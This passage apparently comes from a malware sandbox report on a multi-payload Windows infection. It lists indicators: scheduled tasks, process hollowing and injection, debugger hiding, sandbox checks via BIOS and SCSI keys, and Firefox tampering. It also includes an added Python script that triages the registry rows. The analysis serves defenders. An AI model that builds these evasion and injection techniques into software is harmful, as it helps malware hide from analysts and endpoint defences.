Three different lookup services from one infection is another sign that several independent payloads are running; the api.2ip.ua lookups in particular are commonly seen in STOP/Djvu infections.
Drops file in System32 directory 56 IoCs
The 56 rows group into five patterns; every row is "File opened for modification" unless marked "created".

Scheduled task definitions written by svchost.exe (the Task Scheduler service) under C:\Windows\System32\Tasks\:
dqMFPCMVHmhnSY, spujSHjvBOHs, gBcpYIDWL, nMmJzTJTMvgDqJXEl, PowerControl HR, bRciptYQhTCMvEFWGJ, ArGDBXWmyYtLacf2, sOuBCsGGBJoge2, xsEpqqHAgqAwsAroz, Time Trigger Task, gdlTlvZfIMOZAvCeb2, PcFGIyIlUJyYablHCHc2, services64, gsaFyPMzr, ArGDBXWmyYtLacf, PowerControl LG, Firefox Default Browser Agent D03D1E35412D4BF5, User_Feed_Synchronization-{4F246605-F333-40E5-8FE6-2ED3621ADF90}, OneDrive Standalone Update Task-S-1-5-21-2559286294-2439613352-4032193287-1000
The random-name tasks, PowerControl HR/LG and services64 are the sample's; the last three in the list are normal Windows, Firefox and OneDrive tasks.

Local Group Policy rewritten:
C:\Windows\system32\GroupPolicy\gpt.ini | wjichPy.exe
C:\Windows\system32\GroupPolicy\gpt.ini (created) | Install.exe
C:\Windows\system32\GroupPolicy\Machine\Registry.pol (created) | wjichPy.exe

NTFS alternate data stream on the SYSTEM profile directory:
C:\Windows\SysWOW64\config\systemprofile:.repos (created, then opened for modification) | svchost.exe

PowerShell running as SYSTEM (32-bit, via SysWOW64):
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (created once, opened for modification 11 times) | powershell.exe
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log (created) | powershell.exe

WinINet and CryptnetUrlCache activity under the SYSTEM profile, i.e. HTTP and certificate-chain fetches made by processes running as SYSTEM:
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | rundll32.exe, PovXUCA.exe
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | svchost.exe
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE, INetCache\Content.IE5, History\History.IE5, INetCookies | PovXUCA.exe
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft, ...\CryptnetUrlCache, ...\CryptnetUrlCache\MetaData, ...\CryptnetUrlCache\Content | PovXUCA.exe
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6 and Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6 | PovXUCA.exe
C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 and Content\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 | PovXUCA.exe
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData and Content\644B8874112055B5E195ECB0E8F243A4 | svchost.exe
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData and Content\103621DE9CD5414CC2538780B4B75751 | svchost.exe
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData and Content\6DB145CFEEC544B1582FED1ADA3370DD | svchost.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
pid | process
1748 | 5875517.scr
4748 | 3040445.scr
5632 | 9k747JMG7jwW9QQSPMvI1cd9.exe
5624 | qMwqayby3LtBSXcMFZn4WENT.exe
976 | QXHofo5pEteva5oWRgeBqUVV.exe
1124 | pDOVOMsZF5WLWhICeZK_Vlir.exe
6832 | I3gaVL3bm1lMtsvde3S141IC.exe
5356 | wwl.exe
6292 | 8043795.exe
7380 | 4203002.exe
3628 | 7963793.scr
3796 | 7048378.scr
7536 | 6419.exe
4460 | BC4C.exe
6120 | wwi.exe
8044 | D9E4.exe
10020 | EACD.exe
7500 | A8C5.exe
ThreadHideFromDebugger detaches the thread from any attached debugger's event stream; it is the same set of processes that query the BIOS version strings and EnableLUA.
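The registry rows in the signatures above all share one printed shape, "operation key [= "value"] process", so they can be parsed back into structured records and rolled up per process: which anti-analysis probes each process made (BIOS version strings, country code, EnableLUA) and which autorun entries it wrote, with the executable path pulled out of the C-escaped value. The following is an added example, not code from the report or the sandbox. SAMPLE_ROWS is a constructed subset of the rows printed under "Checks BIOS information in registry", "Checks computer location settings", the EnableLUA block and "Adds Run key to start application"; the classification tags, the weights and the user-writable-path heuristic are assumptions of the example.

```python
"""Parse this report's registry rows and profile each process for
anti-analysis probes and autorun persistence.
Added example, not part of the sandbox report."""
import re
from collections import defaultdict
from typing import NamedTuple, Optional

OPERATIONS = ("Key value queried", "Set value (str)", "Key created", "Key deleted")

# Constructed subset of rows copied from the report, one per line.
SAMPLE_ROWS = r"""
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion qMwqayby3LtBSXcMFZn4WENT.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion qMwqayby3LtBSXcMFZn4WENT.exe
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA qMwqayby3LtBSXcMFZn4WENT.exe
Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation Sat20ecdfe3ee79f.exe
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\7b094cea-f672-4562-9e16-411086b96df0\\DCC6.exe\" --AutoStart" DCC6.exe
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Microsoft.NET\\Welaehywola.exe\"" Ze2ro.exe
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce OneDriveSetup.exe
""".strip().splitlines()


class RegRow(NamedTuple):
    op: str
    key: str
    value: Optional[str]
    process: str


def unescape(value: str) -> str:
    """The report prints string values C-escaped: \\ for a backslash and
    \" for an embedded quote."""
    return re.sub(r"\\(.)", r"\1", value)


def parse_row(line: str) -> RegRow:
    """Split one printed row into operation, key, optional value, process.
    Keys may contain spaces ("Control Panel", "system recover"), so the
    process name is taken from the right."""
    line = line.strip()
    for op in OPERATIONS:
        if line.startswith(op + " "):
            rest = line[len(op):].strip()
            break
    else:
        raise ValueError(f"unrecognised row: {line!r}")
    if " = " in rest:
        key, _, tail = rest.partition(" = ")
        m = re.fullmatch(r'"(.*)"\s+(\S+)', tail, re.S)
        if not m:
            raise ValueError(f"cannot split value/process: {tail!r}")
        return RegRow(op, key, unescape(m.group(1)), m.group(2))
    key, _, process = rest.rpartition(" ")
    return RegRow(op, key, None, process)


def classify_key(key: str) -> Optional[str]:
    """Tag the anti-analysis probes the report's signatures describe."""
    k = key.lower()
    if k.endswith(("\\systembiosversion", "\\videobiosversion")):
        return "bios_probe"      # hypervisor vendor strings live here on a VM
    if k.endswith("\\control panel\\international\\geo\\nation"):
        return "geofence"        # configured country code
    if k.endswith("\\policies\\system\\enablelua"):
        return "uac_check"       # is UAC on, i.e. is a bypass needed
    return None


AUTORUN_KEY = re.compile(r"\\currentversion\\run(once)?\\", re.I)
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")


def executable_from_value(value: str) -> str:
    """First token of a command line, honouring a quoted image path."""
    value = value.strip()
    if value.startswith('"'):
        return value[1:value.index('"', 1)]
    return value.split(" ", 1)[0]


def profile(rows):
    """process name -> {'checks': set of tags, 'autoruns': [entries]}."""
    out = defaultdict(lambda: {"checks": set(), "autoruns": []})
    for line in rows:
        row = parse_row(line)
        entry = out[row.process]
        tag = classify_key(row.key)
        if tag:
            entry["checks"].add(tag)
        if row.value is not None and AUTORUN_KEY.search(row.key):
            exe = executable_from_value(row.value)
            entry["autoruns"].append({
                "name": row.key.rsplit("\\", 1)[-1],
                "hive": "HKLM" if row.key.startswith("\\REGISTRY\\MACHINE") else "HKU",
                "exe": exe,
                "user_writable": any(s in exe.lower() for s in USER_WRITABLE),
            })
    return dict(out)


def score(entry) -> int:
    """Crude triage weight: VM fingerprinting plus persistence from a
    user-writable path is the combination to look at first."""
    weights = {"bios_probe": 2, "geofence": 1, "uac_check": 1}
    total = sum(weights[t] for t in entry["checks"])
    total += sum(3 if a["user_writable"] else 1 for a in entry["autoruns"])
    return total


if __name__ == "__main__":
    for proc, entry in sorted(profile(SAMPLE_ROWS).items(), key=lambda kv: -score(kv[1])):
        print(score(entry), proc, sorted(entry["checks"]), entry["autoruns"])
```

Run over the full row set, the roll-up shows that the processes querying the BIOS strings are the same ones querying EnableLUA and calling ThreadHideFromDebugger, which is the quickest way to see that those rows describe one protection layer shared by many droppers rather than independent behaviour of each.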
Suspicious use of SetThreadContext 21 IoCs
description | pid | process | target process
PID 3860 set thread context of 5080 | 3860 | Sat2026ef0d60b87a3f5.exe | Sat2026ef0d60b87a3f5.exe
PID 2468 set thread context of 3844 | 2468 | 5125044.scr | 5125044.scr
PID 2808 set thread context of 4860 | 2808 | svchost.exe | svchost.exe
PID 1640 set thread context of 2196 | 1640 | tmpE781_tmp.exe |
PID 648 set thread context of 6940 | 648 | 4x4_z5aLp04hx89ID2XGg6um.exe | 4x4_z5aLp04hx89ID2XGg6um.exe
PID 6292 set thread context of 6404 | 6292 | 8043795.exe | ALU9NmuUdiXkXK7aVOwsE9z7.exe
PID 7132 set thread context of 7388 | 7132 | 5958877.exe | 5958877.exe
PID 7280 set thread context of 4440 | 7280 | forfiles.exe | explorer.exe
PID 4852 set thread context of 7348 | 4852 | tmpB21F_tmp.exe | tmpB21F_tmp.exe
PID 6104 set thread context of 7532 | 6104 | DCC6.exe | DCC6.exe
PID 8856 set thread context of 8028 | 8856 | DCC6.exe | DCC6.exe
PID 6604 set thread context of 10056 | 6604 | services64.exe | explorer.exe
PID 9300 set thread context of 9448 | 9300 | build2.exe | build2.exe
PID 10228 set thread context of 7452 | 10228 | sc.exe | 3CD9.exe
PID 9352 set thread context of 8732 | 9352 | 4769.exe | WMIC.exe
PID 9168 set thread context of 9920 | 9168 | ushtnjuk.exe | svchost.exe
PID 1016 set thread context of 9532 | 1016 | jftucsu | jftucsu
PID 9024 set thread context of 9456 | 9024 | DCC6.exe | DCC6.exe
PID 3592 set thread context of 1752 | 3592 | DCC6.exe | DCC6.exe
PID 3084 set thread context of 10080 | 3084 | jftucsu | jftucsu
PID 3600 set thread context of 8988 | 3600 | DCC6.exe | DCC6.exe
A process setting the thread context of a freshly created copy of itself is the process-hollowing footprint: the child is started suspended, its image is replaced, and SetThreadContext points the entry thread at the new code. The RedLine YARA hits are in exactly those children (5080, 3844, 2196). The rows targeting explorer.exe (from forfiles.exe and services64.exe), svchost.exe (from ushtnjuk.exe) and WMIC.exe (from 4769.exe) are injections into trusted hosts; the WMIC.exe network flows listed earlier are that payload's, not WMIC's.
Drops file in Program Files directory 39 IoCs
Grouped by the writing process; "created" and "modified" stand for "File created" and "File opened for modification".

PovXUCA.exe (18 rows):
created C:\Program Files (x86)\STjmdXhOU\dxARth.dll
created C:\Program Files (x86)\STjmdXhOU\MyZHJOT.xml
created C:\Program Files (x86)\NMbcPgNClKinC\awJHiwg.xml
created C:\Program Files (x86)\NMbcPgNClKinC\WMgXAtj.dll
created C:\Program Files (x86)\gaSWcYIjjvwU2\MdHxiAMRPtfhv.dll
created C:\Program Files (x86)\gaSWcYIjjvwU2\sCjgdHE.xml
created C:\Program Files (x86)\YceypsUXabDXnCzNCPR\aMiDGyU.dll
created C:\Program Files (x86)\YceypsUXabDXnCzNCPR\hqHhhng.xml
created C:\Program Files (x86)\ZHcfdgyasGUn\zTIJojK.dll
created C:\Program Files\Mozilla Firefox\browser\features\{F656EA3B-F8E9-4CE5-AFDA-01494F9CEEFA}.xpi
modified C:\Program Files\Mozilla Firefox\browser\features\{F656EA3B-F8E9-4CE5-AFDA-01494F9CEEFA}.xpi
created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak
modified C:\Program Files\Mozilla Firefox\browser\omni.ja.bak
modified C:\Program Files\Mozilla Firefox\browser\omni.ja
(four rows of the eighteen are the Firefox entries repeated as created/modified pairs above)

md8_8eus.exe (7 rows):
created C:\Program Files (x86)\Company\NewProduct\tmp.edb
created C:\Program Files (x86)\Company\NewProduct\d.jfm
modified C:\Program Files (x86)\Company\NewProduct\d.jfm
modified C:\Program Files (x86)\Company\NewProduct\d.INTEG.RAW
created C:\Program Files (x86)\Company\NewProduct\d
modified C:\Program Files (x86)\Company\NewProduct\d

hJfXrqQQ_Fe0h5fLGBSbNOgz.exe (5 rows):
modified C:\Program Files (x86)\Company\NewProduct\cm3.exe
modified C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini
modified C:\Program Files (x86)\Company\NewProduct\inst001.exe
modified C:\Program Files (x86)\Company\NewProduct\Uninstall.exe

ultramediaburner.tmp (5 rows):
modified C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
created C:\Program Files (x86)\UltraMediaBurner\is-SV5SJ.tmp
created C:\Program Files (x86)\UltraMediaBurner\is-OPB9H.tmp
created C:\Program Files (x86)\UltraMediaBurner\unins000.dat
modified C:\Program Files (x86)\UltraMediaBurner\unins000.dat

Ze2ro.exe (4 rows):
created C:\Program Files\Common Files\YUMUDPGCHK\ultramediaburner.exe
created C:\Program Files\Common Files\YUMUDPGCHK\ultramediaburner.exe.config
created C:\Program Files (x86)\Microsoft.NET\Welaehywola.exe
created C:\Program Files (x86)\Microsoft.NET\Welaehywola.exe.config

GM2TDOTFhN_nbC2OoeD2Rg86.exe (2 rows):
created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe
modified C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe

setup_2.tmp (3 rows):
created C:\Program Files (x86)\FarLabUninstaller\is-CA3EC.tmp
created C:\Program Files (x86)\FarLabUninstaller\unins000.dat
modified C:\Program Files (x86)\FarLabUninstaller\unins000.dat

PovXUCA.exe rewriting Firefox's omni.ja and planting an .xpi under browser\features, together with the random-name DLL/XML pairs and the matching random-name scheduled tasks and Group Policy writes seen under "Drops file in System32 directory", is consistent with a browser-hijacking adware component running as SYSTEM. The .exe.config files next to Welaehywola.exe and ultramediaburner.exe mark those as .NET executables. PowerControl_Svc.exe lines up with the PowerControl HR and PowerControl LG tasks.
Drops file in Windows directory 22 IoCs
description | ioc | process
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdgeCP.exe
File opened for modification | C:\Windows\Tasks\xsEpqqHAgqAwsAroz.job | svchost.exe
File opened for modification | C:\Windows\Tasks\ArGDBXWmyYtLacf.job | svchost.exe
File opened for modification | C:\Windows\Tasks\nMmJzTJTMvgDqJXEl.job | svchost.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdge.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdgeCP.exe
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\Tasks\ArGDBXWmyYtLacf.job | schtasks.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdgeCP.exe
File opened for modification | C:\Windows\Tasks\bRciptYQhTCMvEFWGJ.job | svchost.exe
File created | C:\Windows\Tasks\xsEpqqHAgqAwsAroz.job | schtasks.exe
File created | C:\Windows\Tasks\nMmJzTJTMvgDqJXEl.job | schtasks.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdge.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | Explorer.EXE
File opened for modification | C:\Windows\Debug\ESE.TXT | MicrosoftEdge.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdge.exe
File created | C:\Windows\Tasks\bRciptYQhTCMvEFWGJ.job | schtasks.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdgeCP.exe
File created | C:\Windows\rescache\_merged\3720402701\2274612954.pri | MicrosoftEdgeCP.exe
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash 20 IoCs
pid | pid_target | process | target process
1848 | 4640 | WerFault.exe | Sat20545a92617f.exe
5196 | 4640 | WerFault.exe | Sat20545a92617f.exe
1404 | 2468 | WerFault.exe | 5125044.scr
5548 | 4820 | WerFault.exe | Sat200240b71b.exe
4256 | 4640 | WerFault.exe | Sat20545a92617f.exe
5604 | 4204 | WerFault.exe | setup.exe
6308 | 4640 | WerFault.exe | Sat20545a92617f.exe
6420 | 4204 | WerFault.exe | setup.exe
7060 | 4204 | WerFault.exe | setup.exe
7136 | 5748 | WerFault.exe | wOurEP1Lg22ZZexSGLrzgNTx.exe
6888 | 4204 | WerFault.exe | setup.exe
3388 | 4204 | WerFault.exe | setup.exe
6088 | 4204 | WerFault.exe | setup.exe
7220 | 4640 | WerFault.exe | Sat20545a92617f.exe
7644 | 7132 | WerFault.exe | 5958877.exe
8084 | 4640 | WerFault.exe | Sat20545a92617f.exe
7264 | 4640 | WerFault.exe | Sat20545a92617f.exe
6212 | 5748 | WerFault.exe | wOurEP1Lg22ZZexSGLrzgNTx.exe
8020 | 5748 | WerFault.exe | wOurEP1Lg22ZZexSGLrzgNTx.exe
7892 | 5608 | WerFault.exe | Yry2f6UscYEHvhxNM_NasvjF.exe
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | process
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ustucsu
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ustucsu
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ustucsu
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ustucsu
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ALU9NmuUdiXkXK7aVOwsE9z7.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 3CD9.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | compattelrunner.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ustucsu
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | cyhXA10eOOPKGx2fm1TIDtyP.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | cyhXA10eOOPKGx2fm1TIDtyP.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ustucsu
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Sat20de8d8504.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Sat20de8d8504.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Sat20de8d8504.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ALU9NmuUdiXkXK7aVOwsE9z7.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | ALU9NmuUdiXkXK7aVOwsE9z7.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | compattelrunner.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | cyhXA10eOOPKGx2fm1TIDtyP.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 3CD9.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | 3CD9.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | compattelrunner.exe
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | build2.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | svchost.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | build2.exe
Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | process
5148 | schtasks.exe
4968 | schtasks.exe
10108 | schtasks.exe
9308 | schtasks.exe
8528 | schtasks.exe
8424 | schtasks.exe
9348 | schtasks.exe
5156 | schtasks.exe
7844 | schtasks.exe
3852 | schtasks.exe
8164 | schtasks.exe
3772 | schtasks.exe
8984 | schtasks.exe
5776 | schtasks.exe
3988 | schtasks.exe
6724 | schtasks.exe
Delays execution with timeout.exe 3 IoCs
pid | process
6212 | timeout.exe
9936 | timeout.exe
10020 | timeout.exe
Enumerates system info in registry 2 TTPs 4 IoCs
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Kills process with taskkill 4 IoCs
pid | process
5416 | taskkill.exe
5276 | taskkill.exe
5272 | taskkill.exe
5052 | taskkill.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | OneDriveSetup.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" | OneDriveSetup.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | zxzLMwG.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | zxzLMwG.exe
Modifies data under HKEY_USERS 64 IoCs
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | gWaq3hqPJ5rZctwz9iAX7kUB.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" | gWaq3hqPJ5rZctwz9iAX7kUB.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" | gWaq3hqPJ5rZctwz9iAX7kUB.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" | gWaq3hqPJ5rZctwz9iAX7kUB.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | rundll32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | LzmwAqmV.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = 008db73d89f3540424edb47d450dd49d084297dce82e72baa46d34fdc48d541d8006941f80cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda56814d8834a743ee0ac644490bdb57e23e9975e02cbf6ba54758df21d5904fca66c13de80497139ed9d084295d9e13f4bb4c06d02fdadfd5425d29d470d32f5a06f249ec60b1b79bdf0012dd98cb57920ee9c5a03cdf28d387287cc186270a4f93824dc814d713ae3ac5519cdbd | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | gWaq3hqPJ5rZctwz9iAX7kUB.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | wjichPy.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | PovXUCA.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" | gWaq3hqPJ5rZctwz9iAX7kUB.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | PovXUCA.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" | gWaq3hqPJ5rZctwz9iAX7kUB.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" | gWaq3hqPJ5rZctwz9iAX7kUB.exe
